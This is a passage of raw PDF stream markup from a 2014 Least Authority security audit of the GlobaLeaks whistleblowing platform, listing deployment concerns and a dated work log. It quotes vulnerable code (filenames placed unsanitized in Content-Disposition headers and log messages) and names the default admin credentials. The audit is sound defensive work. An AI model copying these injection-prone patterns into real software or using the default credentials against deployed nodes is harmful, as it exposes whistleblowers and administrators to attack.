BT 1 0 0 1 0 50 Tm 4.080814 Tw 12 TL /F4 10 Tf 0 0 0 rg (GlobaLeaks ) Tj /F1 10 Tf (docs mention ) Tj /F4 10 Tf (iptables) Tj /F1 10 Tf (. Default install still allows non-Tor traffic, which may be) Tj T* 0 Tw 1.154597 Tw (dangerous. An adversary might be able to correlate requests to the ) Tj /F4 10 Tf (GlobaLeaks) Tj /F1 10 Tf ( ) Tj /F4 10 Tf (debian ) Tj /F1 10 Tf (repository) Tj T* 0 Tw .328221 Tw (\(not over Tor\) and Node downtime \(while installing updates\), to find the real IP address of the Node.) Tj T* 0 Tw 1.744147 Tw (Also, could ) Tj /F4 10 Tf (GlobaLeaks) Tj /F1 10 Tf ('s modification to ) Tj /F4 10 Tf (iptables ) Tj /F1 10 Tf (rules disable pre-existing rules the sysadmin is) Tj T* 0 Tw (relying on?) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 369.0236 cm
Q
q
1 0 0 1 62.69291 345.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 9 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 14 Tm 2.829147 Tw 12 TL /F1 10 Tf 0 0 0 rg (The install instructions ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (offers involve downloading a shell script from ) Tj /F4 10 Tf (GitHub ) Tj /F1 10 Tf (then) Tj T* 0 Tw (running it as root. You have to trust ) Tj /F4 10 Tf (GitHub ) Tj /F1 10 Tf (and ) Tj /F4 10 Tf (SSL) Tj /F1 10 Tf (.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 339.0236 cm
Q
q
1 0 0 1 62.69291 303.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 21 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 26 Tm /F1 10 Tf 12 TL .696412 Tw (The default credentials are admin:globaleaks. I don't think you can change them without having the) Tj T* 0 Tw 1.150651 Tw (service running, which leaves a window of vulnerability. It would be better to randomly generate a) Tj T* 0 Tw (password during the install.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 297.0236 cm
Q
q
1 0 0 1 62.69291 273.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 9 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 14 Tm 3.661647 Tw 12 TL /F1 10 Tf 0 0 0 rg (How do ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (authors notify Node administrators of security updates? What are their) Tj T* 0 Tw (disclosure/transparency practices?) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 267.0236 cm
Q
q
1 0 0 1 62.69291 243.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 9 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 14 Tm .992485 Tw 12 TL /F4 10 Tf 0 0 0 rg (GlobaLeaks ) Tj /F1 10 Tf (has an ) Tj /F4 10 Tf (SMTP ) Tj /F1 10 Tf (server set up for sending notifications by default. Can't this be used for) Tj T* 0 Tw (sending spam? It's at least a single point of failure.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 237.0236 cm
Q
q
1 0 0 1 62.69291 201.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 21 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 26 Tm 1.321235 Tw 12 TL /F4 10 Tf 0 0 0 rg (GlobaLeaks ) Tj /F1 10 Tf (should make sure that the user is warned to use Tor ) Tj /F4 10 Tf (from an unrelated location) Tj /F1 10 Tf (. For) Tj T* 0 Tw .839318 Tw (example, if an employee is submitting a leak to a company's internal whistleblowing system, the IT) Tj T* 0 Tw (department can list all users who were running Tor at the time of submission to figure out who it was.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 195.0236 cm
Q
q
1 0 0 1 62.69291 171.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 9 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL .45229 Tw (Multi-language support might leak the user's selected language through traffic analysis \(the fact that) Tj T* 0 Tw (they changed languages, or page sizes\). This could help de-anonymize the user.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 165.0236 cm
Q
q
1 0 0 1 62.69291 141.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 9 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL 1.408651 Tw (Attacks de-anonymizing the THS. If the THS box is also connected to the Internet, the adversary) Tj T* 0 Tw (might be able to check an IP-address guess by seeing how well the clocks are in sync.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 135.0236 cm
Q
q
1 0 0 1 62.69291 99.02362 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 21 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 26 Tm 1.304985 Tw 12 TL /F4 10 Tf 0 0 0 rg (GlobaLeaks ) Tj /F1 10 Tf (warns if the user is connected by tor2web, but not onion.to. It's impossible to do this) Tj T* 0 Tw 1.262927 Tw (perfectly in general \(it relies on the gateway adding headers\), but it could have a note like "make) Tj T* 0 Tw (sure you are really using Tor and not a gateway.") Tj T* ET
Q
Q
q
Q
Q
 
endstream
endobj
% 'R380': class PDFStream 
380 0 obj
% page stream
<< /Length 1100 >>
stream
1 0 0 1 0 0 cm  BT /F1 12 Tf 14.4 TL ET
q
1 0 0 1 62.69291 741.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
BT 1 0 0 1 6 11 Tm  T* ET
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 14 Tm 1.029213 Tw 12 TL /F1 10 Tf 0 0 0 rg (A more invasive detection technique may be worth considering. For example, the ) Tj /F4 10 Tf (JavaScript ) Tj /F1 10 Tf (client) Tj T* 0 Tw (could ping ) Tj 0 0 .501961 rg (http://check.torproject.org ) Tj 0 0 0 rg (and tell the user the result.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 735.0236 cm
Q
q
1 0 0 1 62.69291 711.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 9 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 14 Tm .110651 Tw 12 TL /F1 10 Tf 0 0 0 rg (Does hash randomization need to be enabled to prevent DoS attacks? This is documented in ) Tj 0 0 .501961 rg (Python) Tj T* 0 Tw (Documentation ) Tj 0 0 0 rg (and ) Tj 0 0 .501961 rg (Python Issue 13703) Tj 0 0 0 rg (.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 711.0236 cm
Q
q
1 0 0 1 62.69291 711.0236 cm
Q
 
endstream
endobj
% 'R381': class PDFStream 
381 0 obj
% page stream
<< /Length 10144 >>
stream
1 0 0 1 0 0 cm  BT /F1 12 Tf 14.4 TL ET
q
1 0 0 1 62.69291 744.0236 cm
q
BT 1 0 0 1 0 3.5 Tm 21 TL /F2 17.5 Tf 0 0 0 rg (Appendix A. Work Log) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 714.0236 cm
q
BT 1 0 0 1 0 3 Tm 18 TL /F2 15 Tf 0 0 0 rg (Prior to This Audit) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 672.0236 cm
q
0 0 0 rg
BT 1 0 0 1 0 26 Tm /F1 10 Tf 12 TL 1.347984 Tw (Least Authority had collected some auditing notes and examined the software previously as part of an) Tj T* 0 Tw .814985 Tw (Architectural Design Review document. This Report and Work Log are specific to only the recent code /) Tj T* 0 Tw (implementation audit work occurring in February, 2014.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 642.0236 cm
q
BT 1 0 0 1 0 3 Tm 18 TL /F2 15 Tf 0 0 0 rg (2014-01-28 to 2014-02-03) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 624.0236 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (The first week of audit work followed this rough process:) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 618.0236 cm
Q
q
1 0 0 1 62.69291 618.0236 cm
Q
q
1 0 0 1 62.69291 606.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 5.66 0 Td (1.) Tj T* -5.66 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (Contacted the development team about audit kick off.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 600.0236 cm
Q
q
1 0 0 1 62.69291 588.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 5.66 0 Td (2.) Tj T* -5.66 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (Checked out codebases and set up local test environments.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 582.0236 cm
Q
q
1 0 0 1 62.69291 570.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 5.66 0 Td (3.) Tj T* -5.66 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (Played with the UI, while brainstorming about attack surfaces and threat models.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 564.0236 cm
Q
q
1 0 0 1 62.69291 552.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 5.66 0 Td (4.) Tj T* -5.66 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (Read design documentation, along with some previous audits and related projects.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 546.0236 cm
Q
q
1 0 0 1 62.69291 534.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 5.66 0 Td (5.) Tj T* -5.66 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (Examined the codebase layout, dependencies, and large scale organization.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 534.0236 cm
Q
q
1 0 0 1 62.69291 504.0236 cm
q
BT 1 0 0 1 0 3 Tm 18 TL /F2 15 Tf 0 0 0 rg (2014-02-04) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 492.0236 cm
Q
q
1 0 0 1 62.69291 492.0236 cm
Q
q
1 0 0 1 62.69291 468.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 9 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL .895542 Tw (How does the client get data from the backend? Does it talk to a database directly? Answer: no, it) Tj T* 0 Tw (sends REST requests which go to handlers.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 462.0236 cm
Q
q
1 0 0 1 62.69291 450.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (Began to systematically document each dependency and its purpose.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 444.0236 cm
Q
q
1 0 0 1 62.69291 432.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (Read over all of the ) Tj /F3 10 Tf (login_* ) Tj /F1 10 Tf (methods to understand authentication basics.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 426.0236 cm
Q
q
1 0 0 1 62.69291 414.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (Read the ) Tj /F4 10 Tf (Storm ) Tj /F1 10 Tf (tutorial enough to understand the ) Tj /F3 10 Tf (login_* ) Tj /F1 10 Tf (methods.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 408.0236 cm
Q
q
1 0 0 1 62.69291 372.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 21 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 26 Tm 2.163976 Tw 12 TL /F1 10 Tf 0 0 0 rg (Noticed that ) Tj /F3 10 Tf (globaleaks.settings.transact ) Tj /F1 10 Tf (decorated functions all run on a thread pool.) Tj T* 0 Tw .403876 Tw (This seems prone to race condition problems, and we should verify if this is a safe practice. \(Even if) Tj T* 0 Tw (not exploitable it may be bug-prone.\)) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 372.0236 cm
Q
q
1 0 0 1 62.69291 342.0236 cm
q
BT 1 0 0 1 0 3 Tm 18 TL /F2 15 Tf 0 0 0 rg (2014-02-05) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 330.0236 cm
Q
q
1 0 0 1 62.69291 330.0236 cm
Q
q
1 0 0 1 62.69291 306.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 9 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 14 Tm .086136 Tw 12 TL /F1 10 Tf 0 0 0 rg (Checked the results of ) Tj /F4 10 Tf (dieharder ) Tj /F1 10 Tf (tests on the random number generator. It passes diehard_birthdays) Tj T* 0 Tw (with a p-value of 0.56696925. The generator is too slow for the rest of the tests, so I'm stopping it.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 300.0236 cm
Q
q
1 0 0 1 62.69291 240.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 45 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 50 Tm .57811 Tw 12 TL /F1 10 Tf 0 0 0 rg (What's the runtime process structure of the backend? We run with ) Tj /F4 10 Tf (strace ) Tj /F1 10 Tf (to follow a simple request) Tj T* 0 Tw 1.373735 Tw (for the main page. There's a main Python process, another that reads a ) Tj /F4 10 Tf (SQLite ) Tj /F1 10 Tf (DB, another that) Tj T* 0 Tw 1.074269 Tw (seems to be periodically firing off temporary processes and waiting \(both that and the temporaries) Tj T* 0 Tw 2.910651 Tw (wait for something that doesn't happen\). The main process sets up a thread area and loads) Tj T* 0 Tw /F4 10 Tf (pthreads) Tj /F1 10 Tf (. All these processes read and write "x", to sync up?) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 234.0236 cm
Q
q
1 0 0 1 62.69291 210.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 9 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 14 Tm 2.915976 Tw 12 TL /F1 10 Tf 0 0 0 rg (Investigated the use of ) Tj /F3 10 Tf (Random.atfork\(\)) Tj /F1 10 Tf (. Inspected ) Tj /F3 10 Tf (dump_file_fs\(\)) Tj /F1 10 Tf (: it doesn't have any) Tj T* 0 Tw (side-effects which could racily interface with the other threads.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 204.0236 cm
Q
q
1 0 0 1 62.69291 192.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (Looked for discrepancies between client-side and server-side logic.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 186.0236 cm
Q
q
1 0 0 1 62.69291 162.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 9 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 14 Tm 4.578555 Tw 12 TL /F1 10 Tf 0 0 0 rg (\(Now in Issue F.\) What is "Auth temporary disabled, just Tip_id and File_id required" in) Tj T* 0 Tw /F3 10 Tf (handlers/files.py) Tj /F1 10 Tf (. Does this allow whistleblowers to download the files they submit?) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 156.0236 cm
Q
q
1 0 0 1 62.69291 81.22389 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 59.79973 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 23.79973 cm
q
BT 1 0 0 1 0 38 Tm 1.259988 Tw 12 TL /F1 10 Tf 0 0 0 rg (\(This is now Issue G\) Filenames are double-escaped. If you upload a file with a quote in it, it will) Tj T* 0 Tw .274147 Tw (show up like ) Tj /F3 10 Tf (test%22%20quotewithspace) Tj /F1 10 Tf (. Is the percent encoding being done intentionally, or is) Tj T* 0 Tw 2.093516 Tw (it just not being removed? When this bug is fixed, it will introduce a header injection attack. In) Tj T* 0 Tw /F3 10 Tf (handlers/files.py) Tj /F1 10 Tf (:) Tj T* ET
Q
Q
q
1 0 0 1 23 17.79973 cm
Q
q
1 0 0 1 23 -3 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
BT 1 0 0 1 0 2 Tm  T* ET
q
1 0 0 1 20 0 cm
q
q
.825386 0 0 .825386 0 0 cm
q
1 0 0 1 6.6 7.996256 cm
q
.662745 .662745 .662745 RG
.5 w
.960784 .960784 .862745 rg
n -6 -6 516 24 re B*
Q
q
BT 1 0 0 1 0 2 Tm 12 TL /F3 10 Tf 0 .501961 0 rg (self) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (set_header) Tj (\() Tj .729412 .129412 .129412 rg ('Content-Disposition') Tj 0 0 0 rg (,) Tj .729412 .129412 .129412 rg ('attachment; filename=) Tj /F6 10 Tf .733333 .4 .133333 rg (\\") Tj .733333 .4 .533333 rg (%s) Tj .733333 .4 .133333 rg (\\") Tj /F3 10 Tf .729412 .129412 .129412 rg (') Tj 0 0 0 rg ( ) Tj .4 .4 .4 rg (%) Tj 0 0 0 rg ( ) Tj (rfile) Tj ([) Tj .729412 .129412 .129412 rg ('name') Tj 0 0 0 rg (]\)) Tj T* ET
Q
Q
Q
Q
Q
q
Q
Q
q
1 0 0 1 23 -3 cm
Q
q
Q
Q
 
endstream
endobj
% 'R382': class PDFStream 
382 0 obj
% page stream
<< /Length 10999 >>
stream
1 0 0 1 0 0 cm  BT /F1 12 Tf 14.4 TL ET
q
1 0 0 1 62.69291 709.5775 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
BT 1 0 0 1 6 42.44617 Tm  T* ET
q
1 0 0 1 23 40.44617 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (And in ) Tj /F3 10 Tf (handlers/collection.py) Tj /F1 10 Tf (:) Tj T* ET
Q
Q
q
1 0 0 1 23 34.44617 cm
Q
q
1 0 0 1 23 15 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
BT 1 0 0 1 0 2 Tm  T* ET
q
1 0 0 1 20 0 cm
q
q
.771673 0 0 .771673 0 0 cm
q
1 0 0 1 6.6 8.55284 cm
q
.662745 .662745 .662745 RG
.5 w
.960784 .960784 .862745 rg
n -6 -6 552 24 re B*
Q
q
BT 1 0 0 1 0 2 Tm 12 TL /F3 10 Tf 0 .501961 0 rg (self) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (set_header) Tj (\() Tj .729412 .129412 .129412 rg ('Content-Disposition') Tj 0 0 0 rg (,) Tj .729412 .129412 .129412 rg ('attachment; filename=) Tj /F6 10 Tf .733333 .4 .133333 rg (\\") Tj /F3 10 Tf .729412 .129412 .129412 rg (') Tj 0 0 0 rg ( ) Tj .4 .4 .4 rg (+) Tj 0 0 0 rg ( ) Tj (opts) Tj ([) Tj .729412 .129412 .129412 rg ('filename') Tj 0 0 0 rg (]) Tj ( ) Tj .4 .4 .4 rg (+) Tj 0 0 0 rg ( ) Tj .729412 .129412 .129412 rg (') Tj /F6 10 Tf .733333 .4 .133333 rg (\\") Tj /F3 10 Tf .729412 .129412 .129412 rg (') Tj 0 0 0 rg (\)) Tj T* ET
Q
Q
Q
Q
Q
q
Q
Q
q
1 0 0 1 23 15 cm
Q
q
1 0 0 1 23 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (Escaping should always happen "on the way out" in a specific context, not "on the way in.") Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 703.5775 cm
Q
q
1 0 0 1 62.69291 679.5775 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 9 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 14 Tm .563828 Tw 12 TL /F1 10 Tf 0 0 0 rg (There is MD5 code in ) Tj /F3 10 Tf (app/scripts/vendor/md5.js) Tj /F1 10 Tf (. What is it used for? \(Answer: nothing. The) Tj T* 0 Tw /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (developers will remove it.\)) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 673.5775 cm
Q
q
1 0 0 1 62.69291 661.5775 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (Noticed ) Tj /F3 10 Tf (class) Tj ( ) Tj (RTipInstance ) Tj /F1 10 Tf (has an inaccurate doc comment.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 655.5775 cm
Q
q
1 0 0 1 62.69291 595.5775 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 45 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 50 Tm 1.458735 Tw 12 TL /F1 10 Tf 0 0 0 rg (The backend sends to the client absolute times in the future for expiration, and the client checks) Tj T* 0 Tw .683828 Tw (them against its own clock. \() Tj /F3 10 Tf (app/scripts/services.js ) Tj /F1 10 Tf (lines 67, 27-28, 35\) This may allow an) Tj T* 0 Tw .20811 Tw (attacker to make the client keep its session open longer than expected. Can an attacker exploit this?) Tj T* 0 Tw 1.02683 Tw (Does the server check expiry times too? Yes, it looks like it does. Does the server rely on its ) Tj /F4 10 Tf (own) Tj T* 0 Tw /F1 10 Tf (local clock not to jump? \(Attackers can violate that, in many practical cases.\)) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 589.5775 cm
Q
q
1 0 0 1 62.69291 528.7441 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 45.83337 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 21.83337 cm
q
BT 1 0 0 1 0 26 Tm 1.14748 Tw 12 TL /F1 10 Tf 0 0 0 rg (\(This is now Issue I\) In ) Tj /F3 10 Tf (globaleaks/handlers/files.py) Tj /F1 10 Tf (, the following code appears. Can an) Tj T* 0 Tw 1.033555 Tw (attacker, with control over the file name, create fake log entries? The GlobaLeaks developers said) Tj T* 0 Tw (they wanted to have a more robust logging system \(for incident response\) in the future.) Tj T* ET
Q
Q
q
1 0 0 1 23 15.83337 cm
Q
q
1 0 0 1 23 -3 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
BT 1 0 0 1 0 2 Tm  T* ET
q
1 0 0 1 20 0 cm
q
q
.747356 0 0 .747356 0 0 cm
q
1 0 0 1 6.6 8.831132 cm
q
.662745 .662745 .662745 RG
.5 w
.960784 .960784 .862745 rg
n -6 -6 570 24 re B*
Q
q
BT 1 0 0 1 0 2 Tm 12 TL /F3 10 Tf 0 0 0 rg (log) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (err) Tj (\() Tj .729412 .129412 .129412 rg ("Unable to commit new InternalFile ) Tj /F6 10 Tf .733333 .4 .533333 rg (%s) Tj /F3 10 Tf .729412 .129412 .129412 rg (: ) Tj /F6 10 Tf .733333 .4 .533333 rg (%s) Tj /F3 10 Tf .729412 .129412 .129412 rg (") Tj 0 0 0 rg ( ) Tj .4 .4 .4 rg (%) Tj 0 0 0 rg ( ) Tj (\() Tj (original_fname) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (encode) Tj (\() Tj .729412 .129412 .129412 rg ('utf-8') Tj 0 0 0 rg (\),) Tj ( ) Tj (excep) Tj (\)\)) Tj T* ET
Q
Q
Q
Q
Q
q
Q
Q
q
1 0 0 1 23 -3 cm
Q
q
Q
Q
q
1 0 0 1 62.69291 522.7441 cm
Q
q
1 0 0 1 62.69291 474.7441 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 33 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
